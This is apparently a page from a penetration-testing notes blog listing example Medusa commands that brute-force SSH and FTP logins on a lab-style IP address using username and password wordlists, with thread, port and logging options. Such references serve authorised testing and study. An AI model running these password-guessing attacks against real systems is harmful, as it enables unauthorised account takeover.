> For the complete documentation index, see [llms.txt](https://ed4m4s.blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ed4m4s.blog/password-attacks/medusa.md).

# Medusa

### Examples

```
medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh

medusa -h 10.10.10.10 -u root -P pass.txt -M ftp
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 2

medusa -h 10.10.10.10 -U user.txt -P pass.txt -M ssh
medusa -h 10.10.10.10 -U user.txt -P pass.txt -M ssh -n 2222

medusa -h 10.10.10.10 -U user.txt -P pass.txt -M ftp -O log.txt
```
